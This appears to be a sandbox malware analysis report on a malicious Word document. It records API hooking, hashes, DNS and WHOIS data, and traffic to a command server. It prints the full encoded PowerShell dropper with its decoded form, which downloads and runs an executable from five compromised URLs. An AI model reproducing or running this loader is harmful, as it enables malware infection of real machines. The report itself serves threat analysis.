  Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/gallery/js/gallery.js?ver=1.3.3"
  Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\home_url\:\http:\\\/\\\/www.eteensblog.com\,\user_id\:0,\post_id\:0,\nonce\:\7500a30bd0\,\history\:\off\,\i18n\:{\are_you_sure_remove\:\Entire"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/collections.min.js?ver=1.43"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.magnific-popup/jquery.magnific-popup.min.js?ver=1.1.0"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.timeago/jquery.timeago.js?ver=1.5.2"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.timeago/locales/jquery.timeago.en.js"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/plupload/handlers.js?ver=1.43"
  Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\site_url\:\http:\\\/\\\/www.eteensblog.com\,\autosave_interval\:60,\use_login_recaptcha\:false,\recaptcha_api_url\:\https:\\\/\\\/www.google.com\\\/recaptcha\\\/api.js\,\recaptcha_version\:\"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/front.js?ver=1.43"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/featured-image.js?ver=1.43"
  Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\error_msg\:\Some"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/whats-your-reaction/js/front.js?ver=1.3.2"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/flickity/flickity.pkgd.min.js?ver=2.0.9"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/stickyfill/stickyfill.min.js?ver=2.0.3"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/jquery.placeholder/placeholders.jquery.min.js?ver=4.0.1"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/matchmedia/matchmedia.js"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/matchmedia/matchmedia.addlistener.js"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/picturefill/picturefill.min.js?ver=2.3.1"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/jquery.waypoints/jquery.waypoints.min.js?ver=4.0.0"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/libgif/libgif.js"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/enquire/enquire.min.js?ver=2.1.2"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-sanitize.min.js?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-a11y.min.js?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.11.4"
  Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\timeago\:\on\,\sharebar\:\on\,\microshare\:\on\,\i18n\:{\menu\:{\go_to\:\Go"
  Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/front.js?ver=7.3.2"
  Pattern match: "www.eteensblog.com\/wp-admin\/admin-ajax.php,ajaxSecurity:fc820b0b2a,isMultisite:,path:\/,blogId"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/wp-gdpr-compliance/assets/js/front.js?ver=1567040647"
  Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-embed.min.js?ver=5.2.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.5.3"
  Pattern match: "http://www.eteensblog.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.5.3"
  
  source
  
  File/Memory
  
  relevance
  
  10/10
Spyware/Information Retrieval
- Found a reference to a known community page
  
  details
  
  "<link rel='stylesheet' id='mace-lazy-load-youtube-css' href='http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/css/youtube.min.css?ver=1.3.3' type='text/css' media='all' />" (Indicator: "youtube")
  "var mashsb = {"shares":"0","round_shares":"1","animate_shares":"0","dynamic_buttons":"0","share_url":"http:\/\/www.eteensblog.com\/sweet-18yr-old-rion-makes-her-debut\/","title":"Sweet+18yr+Old+Rion+Makes+Her+Debut","image":"http:\/\/www.eteensblog.com\/wp-content\/uploads\/2019\/08\/rion00001.jpg","desc":"This week's Exploitedteens episode features the dark-haired (and a little mysterious-looking) 18 year old Rion. Yes, that's a very odd name... but I didn't name her (Heh- Heh!). So Rion is brand new to this, \u2026","hashtag":"","subscribe":"link","subscribe_url":"","activestatus":"1","singular":"0","twitter_popup":"1","refresh":"0","nonce":"e70c8dcd53","postid":"","servertime":"1570222740","ajaxurl":"http:\/\/www.eteensblog.com\/wp-admin\/admin-ajax.php"};" (Indicator: "twitter"), "<a class="g1-socials-item-link" href="https://www.facebook.com/YOUR_USERNAME/" target="_blank">" (Indicator: "facebook.com"), "<li class="g1-socials-item g1-socials-item-twitter">" (Indicator: "twitter"), "<a class="g1-socials-item-link" href="https://twitter.com/YOUR_USERNAME" target="_blank">" (Indicator: "twitter"), "<span class="g1-socials-item-icon g1-socials-item-icon-48 g1-socials-item-icon-text g1-socials-item-icon-twitter"></span>" (Indicator: "twitter"), "<span class="g1-socials-item-tooltip-inner">Twitter</span>" (Indicator: "twitter"), "<script type='text/javascript' src='http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/youtube.js?ver=1.3.3'></script>" (Indicator: "youtube")
  
  source
  
  File/Memory
  
  relevance
  
  7/10
System Security
- Hooks API calls
  
  details
  
  "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
  "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
  "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
  "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
  "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1179 (Show technique in the MITRE ATT&CK™ matrix)
Unusual Characteristics
- Installs hooks/patches the running process
  
  details
  
  "WINWORD.EXE" wrote bytes "460be488f57ad501" to virtual address "0xE8F02350" (part of module "OART.DLL")
  "WINWORD.EXE" wrote bytes "e933efddffcccc" to virtual address "0xFDB11210" ("SysFreeString@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "e94b9fddffcccccccccc" to virtual address "0xFDB16230" ("VariantChangeType@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "d708e488f57ad501" to virtual address "0xF28371C0" (part of module "WWLIB.DLL")
  "WINWORD.EXE" wrote bytes "48b8bc5284e6fe070000ffe0" to virtual address "0x77649020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  "WINWORD.EXE" wrote bytes "997df288f57ad501" to virtual address "0xF4C40160" (part of module "MSPTLS.DLL")
  "WINWORD.EXE" wrote bytes "4b0ace88f57ad501" to virtual address "0xF4ACDE48" (part of module "RICHED20.DLL")
  "WINWORD.EXE" wrote bytes "e913b0e9ff" to virtual address "0xFDA550C0" ("OleLoadFromStream@OLE32.DLL")
  "WINWORD.EXE" wrote bytes "24a0000000448b84" to virtual address "0xF483E228" (part of module "GKWORD.DLL")
  "WINWORD.EXE" wrote bytes "e9abc0ddffcc" to virtual address "0xFDB14060" ("SysAllocStringByteLen@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "e933f0ddff" to virtual address "0xFDB11180" ("VariantClear@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "9b72cc8cf57ad501" to virtual address "0xF3A925D8" (part of module "MSPROOF7.DLL")
  "WINWORD.EXE" wrote bytes "d002c2e6fe070000" to virtual address "0xFDABA558" (part of module "OLE32.DLL")
  "WINWORD.EXE" wrote bytes "4e0ee488f57ad501" to virtual address "0xF5F4FA00" (part of module "GFX.DLL")
  "WINWORD.EXE" wrote bytes "9d129888f57ad501" to virtual address "0xE7C5D610" (part of module "MSO.DLL")
  "WINWORD.EXE" wrote bytes "5855bd88f57ad501" to virtual address "0x3F0F3258" (part of module "WINWORD.EXE")
  "powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xEADF755E" (part of module "MSCORWKS.DLL")
  "powershell.exe" wrote bytes "9004018ff57a0000" to virtual address "0xEAB81D70" (part of module "MSCORWKS.DLL")
  "powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xEADF760D" (part of module "MSCORWKS.DLL")
  "powershell.exe" wrote bytes "65488b042590150000" to virtual address "0xEADF8C0B" (part of module "MSCORWKS.DLL")
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
  
  ATT&CK ID
  
  T1179 (Show technique in the MITRE ATT&CK™ matrix)

File Details

All Details:

RE_583658295301_1004.doc

Filename: RE_583658295301_1004.doc
Size: 187KiB (190976 bytes)
Type: doc office
Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: SCSI, Subject: Streamlined, Author: Gwen Labadie, Comments: port implementation, Template: Normal.dotm, Last Saved By: Alysha Bauch, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 4 16:51:00 2019, Last Saved Time/Date: Fri Oct 4 16:51:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0
Architecture
: WINDOWS
SHA256
: 97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f
MD5
: 1ce6bf7b27e020fcb32d479495d5d0f8
SHA1
: 71cd3820f795b42b9cd3bef387f574fa10ac34a1
ssdeep
: 3072:TsTXo9V8rbIKgdzSrG2KyIwLx3+f2qxNjpWlsejBa/RG9GH7Edks:TsTXo9V8rbIKUzSZnLx3+f2qxNj6sej/

Resources

Icon

Visualization

Input File (PortEx)

Classification (TrID)

54.2% (.DOC) Microsoft Word document
32.2% (.DOC) Microsoft Word document (old ver.)
13.5% (.) Generic OLE2 / Multistream Compound File

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 6 processes in total.

WINWORD.EXE /n "C:\RE_583658295301_1004.doc" (PID: 3988)
powershell.exe powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABtAG8AdABpAHYAYQB0AGkAbgBnAHEAdQBxAD0AJwBJAG4AdABlAGwAbABpAGcAZQBuAHQAYgBxAHYAJwA7ACQAbQBvAGQAZQBsAHMAdgBoAHoAIAA9ACAAJwA4ADkANwAnADsAJABBAHMAcwBpAHMAdABhAG4AdABvAHAAegA9ACcASABhAG4AZABjAHIAYQBmAHQAZQBkAGMAcgBkACcAOwAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQBvAGQAZQBsAHMAdgBoAHoAKwAnAC4AZQB4AGUAJwA7ACQAcABsAHUAbQBrAHEAagA9ACcAVQBTAF8ARABvAGwAbABhAHIAagBzAHoAJwA7ACQAZwByAGUAZQBuAGoAdwBhAD0ALgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABSAHUAcwB0AGkAYwBfAEMAbwB0AHQAbwBuAF8ARgBpAHMAaABzAHYAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAdABlAGUAbgBzAGIAbABvAGcALgBjAG8AbQAvADIAdABnAG0AbgBrAC8AZgBKAFoASQBQAEMAWQBWAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcABhAGwAaQBzAGUAawAuAGMAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAdABnAEoAYgBXAFEATgB0AEoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAG4AbQBpAG4AZgByAGEAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAZQB0AGUAWABlAEoAWQBDAC8AQABoAHQAdABwADoALwAvAGEAYgBiAGEAcwBhAHIAZwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAcQBoAHoAdABqADQAXwBkAHoAcQAzAGUALQAwADEAOQA4ADAAMgAxADUANQAvAEAAaAB0AHQAcABzADoALwAvAHcAZQBpAHEAaQBuAGcANwAuAGMAbwBtAC8AZQB4ADYALwAzAHIAMgBqAHMAXwBvAGMAZwByADMAYgBlAHcAOAA3AC0ANQAzADgANAA2ADAALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAJwBAACcAKQA7ACQARwByAGEAcABoAGkAYwBhAGwAXwBVAHMAZQByAF8ASQBuAHQAZQByAGYAYQBjAGUAegB2AHUAPQAnAEEAZAB2AGEAbgBjAGUAZABpAG4AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIAIABpAG4AIAAkAFIAdQBzAHQAaQBjAF8AQwBvAHQAdABvAG4AXwBGAGkAcwBoAHMAdgBsACkAewB0AHIAeQB7ACQAZwByAGUAZQBuAGoAdwBhAC4AIgBEAGAAbwB3AE4AYABMAE8AQQBkAGYAaQBMAEUAIgAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIALAAgACQAcwBvAGwAaQBkAF8AcwB0AGEAdABlAHoAYwBoACkAOwAkAHcAaQByAGUAbABlAHMAcwBmAHUAZAA9ACcAdwBvAHIAbABkAGMAbABhAHMAcwBuAGsAcAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA1ADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAdAAiACgAJABzAG8AbABpAGQAXwBzAHQAYQB0AGUAegBjAGgAKQA7ACQAYQByAHIAYQB5AHYAaABjAD0AJwBtAGEAcgBvAG8AbgBoAGEAdAAnADsAYgByAGUAYQBrADsAJABBAHoAZQByAGIAYQBpAGoAYQBuAHcAagBrAD0AJwBjAGEAbABjAHUAbABhAHQAZQB1AGYAdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAHUAeQBhAG4AYQBsAHMAdwA9ACcATABvAGMAawBzAG0AdgBvACcA (PID: 2684, Additional Context: <# https://www.microsoft.com/ #> $motivatingquq='Intelligentbqv';$modelsvhz = '897';$Assistantopz='Handcraftedcrd';$solid_statezch=$env:userprofile+'\'+$modelsvhz+'.exe';$plumkqj='US_Dollarjsz';$greenjwa=.('n'+'ew'+'-ob'+'ject') neT.webCLienT;$Rustic_Cotton_Fishsvl='http://www.eteensblog.com/2tgmnk/fJZIPCYV/@http://www.palisek.cz/wp-includes/YtgJbWQNtJ/@http://www.mnminfrasolutions.com/wp-admin/zeteXeJYC/@http://abbasargon.com/wp-admin/sqhztj4_dzq3e-019802155/@https://weiqing7.com/ex6/3r2js_ocgr3bew87-538460/'."s`PLiT"('@');$Graphical_User_Interfacezvu='Advancedinf';foreach($US_Dollarrbr in $Rustic_Cotton_Fishsvl){try{$greenjwa."D`owN`LOAdfiLE"($US_Dollarrbr, $solid_statezch);$wirelessfud='worldclassnkp';If ((.('G'+'et-'+'Item') $solid_statezch)."Le`NgTh" -ge 27543) {[Diagnostics.Process]::"s`TArt"($solid_statezch);$arrayvhc='maroonhat';break;$Azerbaijanwjk='calculateufw'}}catch{}}$Guyanalsw='Locksmvo')
- 897.exe (PID: 3536) 13/69 Hash Seen Before
  - 897.exe --caaf215f (PID: 3372) 13/69 Hash Seen Before
capprep.exe (PID: 3396) 13/69
- capprep.exe --83c0e935 (PID: 2400) 13/69 Hash Seen Before

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activityy	Network Error	Multiscan Match

Network Analysis

This report was generated with enabled TOR analysis

DNS Requests

Domain

Address

Registrar

Country

www.eteensblog.com
OSINT

Associated Artifacts for www.eteensblog.com

Whois Field	Value
Country	US
Creation Date	Mon, 16 Jan 2006 13:41:27 GMT
Creation Date	Mon, 16 Jan 2006 07:41:27 GMT
DNSSEC	unsigned
Domain Name	ETEENSBLOG.COM
EMail	abuse@directnic.com
EMail	eteensblog.com-registrant@directnicwhoiscompliance.com
Expiration Date	Thu, 16 Jan 2020 13:41:27 GMT
Expiration Date	Thu, 16 Jan 2020 07:41:27 GMT
Name Server	NS1.SWIFTWILL.COM
Name Server	NS2.SWIFTWILL.COM
Organization	BGP, LLC
Reigstrar	DNC Holdings, Inc
State	NJ
Status	clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Status	clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Last Update	Sun, 02 Dec 2018 07:04:05 GMT
Last Update	Sun, 02 Dec 2018 01:04:05 GMT
Whois Server	whois.directnic.com

146.82.206.253
TTL: 1799

DNC Holdings, Inc
Organization: BGP, LLC
Name Server: NS1.SWIFTWILL.COM
Creation Date: Mon, 16 Jan 2006 13:41:27 GMT

United States

Contacted Hosts

IP Address

Port/Protocol

Associated Process

Details

146.82.206.253

Associated Artifacts for 146.82.206.253

Details	Associated URL	Threat Level	Positives	Scan Date	Reference
Associated URL http://www.eteensblog.com/2tgmnk/fJZIPCYV/ Threat Level malicious Positives 8/71 Scan Date 10/04/2019 20:38:08 Reference -	http://www.eteensblog.com/2tgmnk/fJZIPCYV/	malicious	8/71	10/04/2019 20:38:08	-
Associated URL http://www.eteensblog.com/2tgmnk/fJZIPCYV Threat Level malicious Positives 6/72 Scan Date 10/04/2019 18:15:12 Reference -	http://www.eteensblog.com/2tgmnk/fJZIPCYV	malicious	6/72	10/04/2019 18:15:12	-
Associated URL http://contactlenses.cc/ Threat Level malicious Positives 2/70 Scan Date 07/21/2019 05:51:05 Reference -	http://contactlenses.cc/	malicious	2/70	07/21/2019 05:51:05	-
Associated URL http://galleries10.exploitedteens.com/ Threat Level suspicious Positives 1/50 Scan Date 11/07/2013 03:56:09 Reference -	http://galleries10.exploitedteens.com/	suspicious	1/50	11/07/2013 03:56:09	-

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 4e2f067e6fba50b24d168515dce7f31da8bd4d3e9f93fa047d404878f338a710 Threat Level malicious Positives 13/72 Scan Date 10/04/2019 20:31:51 Reference VirusTotal	4e2f067e6fba50b24d168515dce7f31da8bd4d3e9f93fa047d404878f338a710	malicious	13/72	10/04/2019 20:31:51	VirusTotal
Associated SHA256 faabccb1ffe41bc64521776a9ce31eb61725beb8efaad424de61bc6aa432d09c Threat Level malicious Positives 16/71 Scan Date 10/04/2019 20:05:50 Reference VirusTotal	faabccb1ffe41bc64521776a9ce31eb61725beb8efaad424de61bc6aa432d09c	malicious	16/71	10/04/2019 20:05:50	VirusTotal
Associated SHA256 3f1f8fd989386c1beddf6223113b18d788f4862325bfae0828080e29e067599b Threat Level malicious Positives 17/72 Scan Date 10/04/2019 18:20:20 Reference VirusTotal	3f1f8fd989386c1beddf6223113b18d788f4862325bfae0828080e29e067599b	malicious	17/72	10/04/2019 18:20:20	VirusTotal
Associated SHA256 a6e58fcdd3b8743865c45d8035bcca1f3ebfde77d9ff9139b5a379289a088cd7 Threat Level malicious Positives 15/73 Scan Date 10/04/2019 18:11:19 Reference VirusTotal	a6e58fcdd3b8743865c45d8035bcca1f3ebfde77d9ff9139b5a379289a088cd7	malicious	15/73	10/04/2019 18:11:19	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain eteensblog.com Threat Level - Positives - Last Resolved 10/04/2019 19:06:18 VirusTotal Report	eteensblog.com	-	-	10/04/2019 19:06:18	Report
Domain www.eteensblog.com Threat Level - Positives - Last Resolved 10/04/2019 17:19:40 VirusTotal Report	www.eteensblog.com	-	-	10/04/2019 17:19:40	Report
Domain davidnessjr.com Threat Level - Positives - Last Resolved 09/28/2019 06:49:42 VirusTotal Report	davidnessjr.com	-	-	09/28/2019 06:49:42	Report
Domain amatuer.tv Threat Level - Positives - Last Resolved 09/14/2019 09:53:58 VirusTotal Report	amatuer.tv	-	-	09/14/2019 09:53:58	Report
Domain mouthtarget.com Threat Level - Positives - Last Resolved 09/14/2019 13:53:39 VirusTotal Report	mouthtarget.com	-	-	09/14/2019 13:53:39	Report

TCP

powershell.exe
PID: 2684

United States

Contacted Countries

HTTP Traffic

Endpoint

Request

URL

Data

146.82.206.253:80 (www.eteensblog.com)

GET

www.eteensblog.com/2tgmnk/fJZIPCYV/

GET /2tgmnk/fJZIPCYV/ HTTP/1.1 Host: www.eteensblog.com Connection: Keep-Alive More Details

Format

Details

Request

GET /2tgmnk/fJZIPCYV/ HTTP/1.1
Host: www.eteensblog.com
Connection: Keep-Alive

Raw Hex

     0 : 00 00 5E 00 01 01 3C 00 27 2E 97 C9 08 00 45 00 [..^...<.'.....E.]
    10 : 00 7C 0F E1 40 00 80 06 D8 54 C0 A8 F0 4D 92 52 [.|..@....T...M.R]
    20 : CE FD C0 6B 00 50 20 29 3F B2 32 E4 C7 A7 50 18 [...k.P )?.2...P.]
    30 : 01 00 1E 3B 00 00 47 45 54 20 2F 32 74 67 6D 6E [...;..GET /2tgmn]
    40 : 6B 2F 66 4A 5A 49 50 43 59 56 2F 20 48 54 54 50 [k/fJZIPCYV/ HTTP]
    50 : 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 77 77 77 2E [/1.1..Host: www.]
    60 : 65 74 65 65 6E 73 62 6C 6F 67 2E 63 6F 6D 0D 0A [eteensblog.com..]
    70 : 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 [Connection: Keep]
    80 : 2D 41 6C 69 76 65 0D 0A 0D 0A [-Alive....]

172.105.11.15:8080

POST

172.105.11.15/dma/usbccid/sess/

Format

Details

Request

POST /dma/usbccid/sess/ HTTP/1.1
Referer: http://172.105.11.15/dma/usbccid/sess/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 172.105.11.15:8080
Content-Length: 475
Connection: Keep-Alive
Cache-Control: no-cache

1MIehVKZtKVQCnesve=VfJ92nn2RR0tVIHBYbY37ic55vwcWc4wxUpcJPNaj7l8n8Q2hFoxZosMmutaIEzyZ1RVqs5nChjRHEDP3xMDSJY5aRk3I4B1G7AtRq6g%2B1O77YRFUuZSYRdYnopu%2B4LIAvMwhT6dCEuRLohcy4cW6lYOlMqD4%2B5vge5EeMqZbHKXU1fJrmwByDWk7vtucWsW9OtSOsA19zSM5hPiV6y9p6ANxcDidBd5oy1Ya7WPUQh2HNpBjUrH59%2BZroZ1%2FmHddQxpMZ3YAdMi5NSzIheGcglXgD%2BbeMjDRMXmauGldUOB5DQr3XyKUxot%2F1LY7hLzR2Negv1fMreG21bRxBcVAn3eBgn95ff2FXN0%2BaCw8SJ7uPCDB%2FHz4n%2Fo7RkIv53SB4jAq1mvjjPbnRx2zafEbgM7A28pAMTj6ZLvM%2Fgz%2Br1qElyi

Raw Hex

     0 : 00 00 5E 00 01 01 3C 00 27 2E 97 C9 08 00 45 00 [..^...<.'.....E.]
    10 : 03 B1 10 04 40 00 80 06 7E D4 C0 A8 F0 4D AC 69 [....@...~....M.i]
    20 : 0B 0F C0 6C 1F 90 39 7A 81 C5 D1 64 2E 32 50 18 [...l..9z...d.2P.]
    30 : 01 00 AC 57 00 00 50 4F 53 54 20 2F 64 6D 61 2F [...W..POST /dma/]
    40 : 75 73 62 63 63 69 64 2F 73 65 73 73 2F 20 48 54 [usbccid/sess/ HT]
    50 : 54 50 2F 31 2E 31 0D 0A 52 65 66 65 72 65 72 3A [TP/1.1..Referer:]
    60 : 20 68 74 74 70 3A 2F 2F 31 37 32 2E 31 30 35 2E [ http://172.105.]
    70 : 31 31 2E 31 35 2F 64 6D 61 2F 75 73 62 63 63 69 [11.15/dma/usbcci]
    80 : 64 2F 73 65 73 73 2F 0D 0A 43 6F 6E 74 65 6E 74 [d/sess/..Content]
    90 : 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 [-Type: applicati]
    A0 : 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 [on/x-www-form-ur]
    B0 : 6C 65 6E 63 6F 64 65 64 0D 0A 44 4E 54 3A 20 31 [lencoded..DNT: 1]
    C0 : 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F [..User-Agent: Mo]
    D0 : 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 [zilla/4.0 (compa]
    E0 : 74 69 62 6C 65 3B 20 4D 53 49 45 20 37 2E 30 3B [tible; MSIE 7.0;]
    F0 : 20 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B [ Windows NT 6.1;]
   100 : 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F [ WOW64; Trident/]
   110 : 37 2E 30 3B 20 53 4C 43 43 32 3B 20 2E 4E 45 54 [7.0; SLCC2; .NET]
   120 : 20 43 4C 52 20 32 2E 30 2E 35 30 37 32 37 3B 20 [ CLR 2.0.50727; ]
   130 : 2E 4E 45 54 20 43 4C 52 20 33 2E 35 2E 33 30 37 [.NET CLR 3.5.307]
   140 : 32 39 3B 20 2E 4E 45 54 20 43 4C 52 20 33 2E 30 [29; .NET CLR 3.0]
   150 : 2E 33 30 37 32 39 3B 20 4D 65 64 69 61 20 43 65 [.30729; Media Ce]
   160 : 6E 74 65 72 20 50 43 20 36 2E 30 3B 20 2E 4E 45 [nter PC 6.0; .NE]
   170 : 54 34 2E 30 43 3B 20 2E 4E 45 54 34 2E 30 45 29 [T4.0C; .NET4.0E)]
   180 : 0D 0A 48 6F 73 74 3A 20 31 37 32 2E 31 30 35 2E [..Host: 172.105.]
   190 : 31 31 2E 31 35 3A 38 30 38 30 0D 0A 43 6F 6E 74 [11.15:8080..Cont]
   1A0 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 37 35 0D [ent-Length: 475.]
   1B0 : 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 [.Connection: Kee]
   1C0 : 70 2D 41 6C 69 76 65 0D 0A 43 61 63 68 65 2D 43 [p-Alive..Cache-C]
   1D0 : 6F 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 [ontrol: no-cache]
   1E0 : 0D 0A 0D 0A 31 4D 49 65 68 56 4B 5A 74 4B 56 51 [....1MIehVKZtKVQ]
   1F0 : 43 6E 65 73 76 65 3D 56 66 4A 39 32 6E 6E 32 52 [Cnesve=VfJ92nn2R]
   200 : 52 30 74 56 49 48 42 59 62 59 33 37 69 63 35 35 [R0tVIHBYbY37ic55]
   210 : 76 77 63 57 63 34 77 78 55 70 63 4A 50 4E 61 6A [vwcWc4wxUpcJPNaj]
   220 : 37 6C 38 6E 38 51 32 68 46 6F 78 5A 6F 73 4D 6D [7l8n8Q2hFoxZosMm]
   230 : 75 74 61 49 45 7A 79 5A 31 52 56 71 73 35 6E 43 [utaIEzyZ1RVqs5nC]
   240 : 68 6A 52 48 45 44 50 33 78 4D 44 53 4A 59 35 61 [hjRHEDP3xMDSJY5a]
   250 : 52 6B 33 49 34 42 31 47 37 41 74 52 71 36 67 25 [Rk3I4B1G7AtRq6g%]
   260 : 32 42 31 4F 37 37 59 52 46 55 75 5A 53 59 52 64 [2B1O77YRFUuZSYRd]
   270 : 59 6E 6F 70 75 25 32 42 34 4C 49 41 76 4D 77 68 [Ynopu%2B4LIAvMwh]
   280 : 54 36 64 43 45 75 52 4C 6F 68 63 79 34 63 57 36 [T6dCEuRLohcy4cW6]
   290 : 6C 59 4F 6C 4D 71 44 34 25 32 42 35 76 67 65 35 [lYOlMqD4%2B5vge5]
   2A0 : 45 65 4D 71 5A 62 48 4B 58 55 31 66 4A 72 6D 77 [EeMqZbHKXU1fJrmw]
   2B0 : 42 79 44 57 6B 37 76 74 75 63 57 73 57 39 4F 74 [ByDWk7vtucWsW9Ot]
   2C0 : 53 4F 73 41 31 39 7A 53 4D 35 68 50 69 56 36 79 [SOsA19zSM5hPiV6y]
   2D0 : 39 70 36 41 4E 78 63 44 69 64 42 64 35 6F 79 31 [9p6ANxcDidBd5oy1]
   2E0 : 59 61 37 57 50 55 51 68 32 48 4E 70 42 6A [Ya7WPUQh2HNpBj]

Extracted Strings

Download All Memory Strings (8KiB)

